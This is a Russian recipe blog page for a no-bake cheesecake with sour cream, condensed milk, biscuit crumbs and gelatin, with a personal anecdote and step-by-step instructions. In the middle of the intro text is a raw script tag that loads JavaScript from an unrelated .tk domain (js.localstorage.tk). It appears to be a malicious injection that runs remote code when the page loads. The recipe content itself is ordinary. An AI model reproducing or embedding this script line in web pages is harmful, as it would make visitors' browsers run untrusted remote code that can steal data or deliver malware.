Чизкейк без выпечки с сгущенкой и сметаной

Простой и быстрый рецепт чизкейка
Чизкейк без выпечки с сгущенкой и сметаной

Оценить рецепт: 

5 (2 оценок)
Легко
45 мин

Был у меня смутный период в жизни, когда переехали мы в новую квартиру и наша газовая печка там не прокатила. Жила я без печки и, соответственно, без выпечки, больше месяца. Выживала, как могла: блины и разные жирные хрустики съедались быстрее, чем успевала готовить. А когда всем надоели мои «фу, опять блины!», пришлось импровизировать, и я решилась на выпечку без выпечки. Не пожалела – вкуснятина получилась что надо и на «ура» пропала с кофе и горячим чаем.
Итак, дамы и господа, представляю вам чизкейк, который не надо выпекать. Вообще. Ни одного коржика. Даже не смотря на то, что теперь моя печка уже устала от разнообразной сладкой выпечки, такой чизкейк я часто делаю на завтрак. Вечером накалапуцала, а утром уже готова вкусная «приправка» к горячему кофе.
<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script>

Ингредиенты: 
Сметана 15%+
450 гр.
Сгущенное молоко
300 гр.
Печенье
300 гр.
Сливочное масло
100 гр.
Желатин
10 гр.
Вода
3/4 стакана
Рецепт чизкейка без выпечки

Начинаем мы с нашей основы – «коржа». Для этого купленное печенье следует размять в крошку (обычно я беру песочное печенье). Оно мягкое и легко перетирается в среднюю крошку.
Итак, мну печенье руками, можно и вилкой, но пальчиками лучше всего получается размять комочки. В итоге, у нас должна получиться полная мисочка не «муки», а крупных крошек. В них мы выливаем растопленное на водяной бане сливочное масло (масло можно так же растопить и в микроволновке, но как по мне, от этого портится консистенция и появляется неприятный запах с привкусом). Так что пользуемся только водяной баней (она нам еще пригодится!). Крошечки с маслом вымешиваем до однородной массы (она должна получится вязкая, комковатая) и ровным слоем, выступая немного на бортики, выкладываем в форму. Последнюю надо заранее подготовить – постелите пергаментную бумагу. И форму с нашей основой убираем в холодильник, минут на 30-ть (если простоит больше – не страшно, главное, чтобы не меньше).

Быстрый рецепт чизкейка со сгущенкой

Смешиваем сметану и сгущенное молоко. Можно венчиком, но я использую блендер – так масса получается воздушнее и однороднее. Для того, чтобы сметано-сгущенная основа у нас стала вязкой и не расплывалась по чизкеку, используем желатин. Для этого желатин разводим в ¾ стакана воды комнатной температуры. Ему понадобится около десяти минут, чтобы раствориться и набухнуть. Далее готовим водяную баньку и растапливаем желатин. Когда он полностью растворится осторожно, тонкой струйкой вливаем желатин в крем. Не бойтесь, что желатин горячий – десерту это не навредит. Хорошо размешайте крем.

Чизкейк без выпечки

Теперь пора доставать нашу форму с коржом из холодильника – заливаем её получившимся кремом. Вот, вкусный десерт практически готов. Я ещё добавляю вишню: предварительно достав косточки, высыпаю в форму прямо на густой крем, перед тем, как убрать чизкейк в холодильник. Его также можно посыпать шоколадной крошкой, цукатами, кусочками фруктов или даже растворимым кофе. После чего убираем чизкейк в холодильник на 3-4 часа. Вот и все – вкуснятина к чаю готова! Приятного аппетита!

Понравился рецепт? Оставьте комментарий